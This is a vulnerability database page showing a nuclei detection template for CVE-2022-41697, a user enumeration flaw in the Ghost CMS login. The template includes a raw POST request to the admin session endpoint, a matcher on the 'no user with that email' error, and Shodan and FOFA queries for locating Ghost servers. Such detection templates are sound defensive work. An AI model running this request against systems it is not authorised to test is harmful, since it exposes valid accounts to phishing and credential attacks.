Lucene search
K

Ghost CMS - User Enumeration

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Ghost CMS 5.9.4 login reveals if a user exists, enabling enumeration; update to the latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the Ghost content management system, related to inconsistencies in responses to incoming requests, allows a hacker to disclose confidential information.
10 Nov 202300:00
bdu_fstec
Circl
CVE-2022-41697
22 Dec 202212:13
circl
CNNVD
Ghost CMS 安全漏洞
22 Dec 202200:00
cnnvd
CNVD
Ghost Information Disclosure Vulnerability
26 Dec 202200:00
cnvd
CVE
CVE-2022-41697
23 Dec 202223:03
cve
Cvelist
CVE-2022-41697
23 Dec 202223:03
cvelist
NVD
CVE-2022-41697
22 Dec 202210:15
nvd
OSV
BIT-GHOST-2022-41697
6 Mar 202410:53
osv
Prion
Design/Logic Flaw
22 Dec 202210:15
prion
Positive Technologies
PT-2022-7088
22 Dec 202200:00
ptsecurity
Rows per page
id: CVE-2022-41697

info:
  name: Ghost CMS - User Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Ghost CMS 5.9.4 contains a user enumeration vulnerability in the login functionality. The application reveals whether a user account exists through different error messages, allowing attackers to enumerate valid user accounts via specially-crafted HTTP requests.
  impact: |
    Attackers can identify valid usernames/email addresses, facilitating targeted attacks such as phishing, credential stuffing, or brute-force password attacks.
  remediation: |
    Update to the latest version of Ghost CMS or apply security patches that implement consistent error messages regardless of whether the user exists.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1625
    - https://nvd.nist.gov/vuln/detail/CVE-2022-41697
    - https://github.com/tryghost/ghost
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-41697
    cwe-id: CWE-204
    epss-score: 0.20196
    epss-percentile: 0.97145
  metadata:
    verified: true
    max-request: 1
    vendor: ghost
    product: ghost
    shodan-query: http.component:"ghost"
    fofa-query: app="Ghost"
  tags: cve,cve2022,ghost,enum,disclosure

http:
  - raw:
      - |
        POST /ghost/api/admin/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{randstr}}@example.com","password":"{{randstr}}"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "There is no user with that email address", "NotFoundError")'
          - 'contains(content_type, "application/json")'
          - '!contains(body, "Resource not found")'
          - 'status_code == 404'
        condition: and
# digest: 4b0a004830460221008c6b44e9264490579be66b221dfc25a8dd1e94276b43878045c6b89126d989fd022100e26061517597ec6bb3d5269931cefbc4460636461ce90c0e19a1550cba273e7b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.15.3
CVSS 35.3
EPSS0.20196
SSVC
20